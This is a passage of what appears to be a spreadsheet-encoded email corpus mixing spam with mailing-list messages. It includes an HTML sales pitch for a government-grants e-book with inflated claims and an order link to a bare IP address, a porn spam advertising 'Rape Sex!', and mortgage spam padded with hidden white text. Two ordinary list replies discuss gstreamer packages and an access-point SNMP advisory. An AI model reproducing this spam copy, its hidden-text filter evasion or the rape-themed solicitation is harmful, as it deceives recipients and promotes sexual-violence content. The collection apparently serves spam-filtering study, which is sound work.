 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://211.141.69.11:10411/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 If above link doesn't work, &lt;a href="http://211.141.69.11:10411/grants.htm"&gt;Click Here
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 4784GBrs1-518UZFh0043nkZY7-777l28
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rape!!.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;Rape Sex!&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://hot12.website-hoster.com/hot/"&gt;&lt;font size=3D"5"&gt;CLICK=
  HERE&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 &lt;b&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D&lt;br&gt;
 To be removed from our "in house" mailing list
 &lt;a href=3D"http://hot12.website-hoster.com/remove.html"&gt;CLICK HERE&lt;/a&gt;&lt;br&gt;
 and you will automatically be removed from future mailings.&lt;br&gt;
 &lt;br&gt;
 You have received this email by either requesting more information&lt;br&gt;
 on one of our sites or someone may have used your email address.&lt;br&gt;
 If you received this email in error, please accept our apologies.&lt;br&gt;
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Gstreamer Repository
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 14, 2002 at 10:59:22AM -0400, Thomas J. Baker wrote:
 &gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3
 &gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at
 &gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg
 &gt; file, etc.
 I've been using the gstreamer repository with Rawhide Gnome 2 for the
 last month or so with no problems. Even the new rhythmbox works (if
 you can call taking 5 minutes to load my mp3 directory "working").
 It might be something with Ximian's Gnome 2 snaps. AFAIK, they're 
 pretty much straight out of CVS and hence a lot more experimental than 
 some of the other Gnome 2 packages out there.
 gary
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [VulnWatch] Foundstone Labs Advisory - Information Leakage in Orinoco and Compaq Access Points
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, August 9, 2002, at 11:12 AM, Foundstone Labs wrote:
 &gt; An information leakage vulnerability exists in Orinoco and Compaq OEM
 &gt; access points, disclosing the unique SNMP community string. As a result,
 &gt; an attacker can query the community string and gain the ability to
 &gt; change system configuration including Wired Equivalent Privacy (WEP)
 &gt; keys and Domain Name Service (DNS) information.
 I think this is missing the point a bit...  Yes, you can query the SNMP 
 community string...  And yes, it's the default PW (not to mention the 
 ESSID and last 5 characters of the default WEP key...)  But they're all 
 easily changed, and indeed, it is highly recommended to do so in the 
 manual.
 Anyone who changes the default settings would not be vulnerable to this 
 particular SNMP probe.  Of course, you can't account for end user 
 stupidity, but that's beyond the scope of this advisory.  ;)
 &gt; Vendor Response:
 &gt;
 &gt; Both vendors were notified of this issue on July 8th, 2002. According
 &gt; to Orinoco, "The Residential Gateway line has been discontinued."
 I've also heard (second hand, but on good authority) that the RG line is 
 alive and well (hence the recent RG-1100, and the upcoming 802.11a 
 version...)
 --Rob
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Borrow Money for any purpose!               GY
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;STYLE&gt;
 BODY {font-family=3D"Arial"}
 TT {font-family=3D"Courier New"}
 BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
 SPAN.TABOOHEADER {display=3Dnone}
 &lt;/STYLE&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;/Span&gt;
 &lt;FONT FACE=3Darial,helvetica&gt;&lt;P ALIGN=3DCENTER&gt;&lt;FONT  SIZE=3D6 FAMILY=3D"S=
 ANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;font color=3D"#0000FF"&gt;&lt;b&gt;Rates are at a 40 year low!&lt;/b&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/=
 font&gt;&lt;B&gt;&lt;FONT FACE=3Darial,helvetica&gt;&lt;U&gt;&lt;FONT  COLOR=3D"#000000" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D5 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;/U&gt;
 &lt;FONT  COLOR=3D"#FFFFFF" style=3D"BACKGROUND-COLOR: #ffffff" FAMILY=3D"SAN=
 SSERIF" 
 FACE=3D"Arial" LANG=3D"0"&gt;7&lt;/FONT&gt;&lt;/font&gt;&lt;/B&gt;&lt;FONT FACE=3Darial,helvetica&gt;=
 &lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMI=
 LY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#FFFFFF" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;7&lt;/FONT&gt;&lt;B&gt;&lt;FONT  COLOR=3D"=
 #000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF"=
  FACE=3D"Arial" LANG=3D"0"&gt;What are you waiting for?&lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF=
 " FACE=3D"Arial" LANG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;Interest Rates are the 
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#CC0000" 
 style=3D"BACKGROUND-COLOR: #ffffff; font-weight:700; font-style:italic" SI=
 ZE=3D3 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;LOWEST&lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF=
 " FACE=3D"Arial" LANG=3D"0"&gt; they've been in
 &lt;b&gt;40 years!&lt;/b&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#FFFFFF" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;7&lt;/FONT&gt;&lt;FONT  COLOR=3D"#00=
 0080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FA=
 CE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;
 &lt;B&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 F=
 AMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;Now is the time to take adva=
 ntage of falling interest rates! &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;There is no advantage in =
 waiting any longer. &lt;BR&gt;
 &lt;/FONT&gt;&lt;U&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
 E=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D=
 3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;
 &lt;/FONT&gt;&lt;/U&gt;&lt;FONT  COLOR=3D"#000080" 
 style=3D"BACKGROUND-COLOR: #ffffff; font-weight:700" SIZE=3D3 FAMILY=3D"SA=
 NSSERIF" 
 FACE=3D"Arial" LANG=3D"0"&gt;Refinance or consolidate high interest &lt;br&gt;
 credit card debt into a
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#D6321B" 
 style=3D"BACKGROUND-COLOR: #ffffff; font-weight:700; font-style:italic" SI=
 ZE=3D4 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;low interest mortgage.&lt;/FON=
 T&gt;&lt;/P&gt;
 &lt;P ALIGN=3DCENTER&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#0000ff" style=3D"BACKGROUND-COLOR: #=
 ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;Why pay mo=
 re then you have too?&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P ALIGN=3DCENTER&gt;&lt;FONT  COLOR=3D"#000080" 
 style=3D"BACKGROUND-COLOR: #ffffff; font-weight:700" SIZE=3D3 FAMILY=3D"SA=
 NSSERIF" 
 FACE=3D"Arial" LANG=3D"0"&gt;Mortgage interest is tax deductible, whereas cre=
 dit card interest is not.&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROU=
 ND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"=
 &gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;Good Credit / Bad Credit / So-So Credit&lt;/B&gt;&lt;BR&gt;
 We have Special Programs for every type of credit history and income level=
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;b&gt;&lt;FONT  COLOR=3D"#0000ff" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
 E=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;No Upfront Fees - No =
 Hidden Fees - Approval in Minutes&lt;/FONT&gt;&lt;/b&gt;&lt;FONT  COLOR=3D"#000080" style=
 =3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial=
 " LANG=3D"0"&gt;&lt;b&gt;
 &lt;/b&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" 
 style=3D"BACKGROUND-COLOR: #ffffff; font-weight:700" FAMILY=3D"SANSSERIF" 
 FACE=3D"Arial" LANG=3D"0"&gt;Get the&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"=
 BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LA=
 NG=3D"0"&gt; &lt;/FONT&gt;
 &lt;FONT  COLOR=3D"#d6321b" style=3D"BACKGROUND-COLOR: #ffffff; font-weight:7=
 00" 
 SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;CASH&lt;/FONT&gt;&lt;FONT  =
 COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"S=
 ANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;
 &lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff; font-weight:7=
 00" 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;you need&lt;/FONT&gt;&lt;FONT  COLOR=
 =3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSE=
 RIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D"#d6321b" style=3D"B=
 ACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LAN=
 G=3D"0"&gt;&lt;B&gt;FAST&lt;/FONT&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: =
 #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;/FONT&gt;&lt;/=
 B&gt;&lt;FONT  COLOR=3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FA=
 MILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;B&gt;It's easy to qualify and your loan review is &lt;/B&gt;
 &lt;/FONT&gt;
 &lt;B&gt;&lt;FONT  COLOR=3D"#D6321B" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 
 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;FREE&lt;/FONT&gt;&lt;/B&gt;&lt;FONT  COLOR=
 =3D"#000080" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSE=
 RIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;U&gt;&lt;FONT  COLOR=3D"#cc0000" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
 E=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;/U&gt;
 &lt;FONT FACE=3Darial,helvetica COLOR=3D"#000000" style=3D"background-color: =
 #ffffff" 
 SIZE=3D"3" FAMILY=3D"SANSSERIF" LANG=3D"0"&gt;&lt;U&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#0000ff" =
 style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D4 FAMILY=3D"SANSSERIF" FACE=3D"=
 Arial" LANG=3D"0"&gt;
 &lt;a href=3D"http://www.lotsonet.com/mort/index.html"&gt;Click Here&lt;/a&gt;&lt;/FONT&gt;&lt;=
 /B&gt;&lt;/U&gt;&lt;B&gt;&lt;FONT  COLOR=3D"#000000" style=3D"BACKGROUND-COLOR: #ffffff" SIZ=
 E=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt; &lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#0000a0" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF=
 " FACE=3D"Arial" LANG=3D"0"&gt;for all details. There is &lt;/FONT&gt;&lt;FONT  COLOR=3D=
 "#d6321b" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF=
 " FACE=3D"Arial" LANG=3D"0"&gt;NO&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000a0" style=3D"BAC=
 KGROUND-COLOR: #ffffff" SIZE=3D3 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D=
 "0"&gt; obligation&lt;U&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/U&gt;&lt;/FONT&gt;&lt;/B&gt;
 &lt;U&gt;
 &lt;FONT  COLOR=3D"#0000ff" style=3D"BACKGROUND-COLOR: #ffffff" SIZE=3D2 FAMI=
 LY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"0"&gt;
 &lt;a href=3D"http://www.lotsonet.com/mort/remove.html"&gt;Unsubscribe By Clicki=
 ng Here&lt;/a&gt;&lt;/FONT&gt;&lt;/U&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;/font&gt;
 &lt;/HTML&gt;
